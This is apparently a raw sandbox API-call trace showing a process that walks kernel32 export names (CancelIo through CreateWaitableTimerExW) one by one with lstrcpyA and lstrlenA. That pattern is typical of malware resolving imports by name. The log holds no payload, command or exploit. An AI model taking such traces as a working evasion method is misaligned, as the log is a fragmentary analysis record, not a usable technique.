[0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.156] lstrlenA (lpString="CANCELIO") returned 8 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.156] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.156] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.156] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.156] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.156] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.157] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.157] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.157] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.157] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.157] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.157] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.157] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.157] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.157] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.157] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.157] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.157] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.157] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.157] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.157] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.157] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.157] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.157] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.157] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.158] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.158] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.158] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.158] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.158] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.158] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.158] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.158] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.158] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.158] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.158] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.158] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.158] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.158] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.158] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.158] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.158] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.158] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.158] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.159] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.159] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.159] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.159] lstrlenA (lpString="COPYFILEA") returned 9 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.159] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.159] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.159] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.159] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.159] lstrlenA (lpString="COPYFILEW") returned 9 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.159] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.159] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.159] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.159] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.159] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.159] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.159] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.159] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.159] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.159] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.160] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.160] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.160] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.160] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.160] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.160] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.160] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.160] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.160] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.160] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.160] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.160] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.160] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.160] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.160] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.160] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.160] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.160] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.160] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.161] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.161] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.161] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.161] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.161] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.161] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.161] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.161] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.161] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.161] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.161] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.161] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.161] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.161] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.161] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.161] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.161] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.161] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.161] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.162] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.162] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.162] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.162] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.162] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.162] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.162] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.162] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.162] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.162] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.162] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.162] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.162] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.162] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.162] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.162] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.162] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.162] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.162] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.162] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.163] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.163] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.163] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.163] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.163] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.163] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.163] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.163] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.163] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.163] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.163] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") 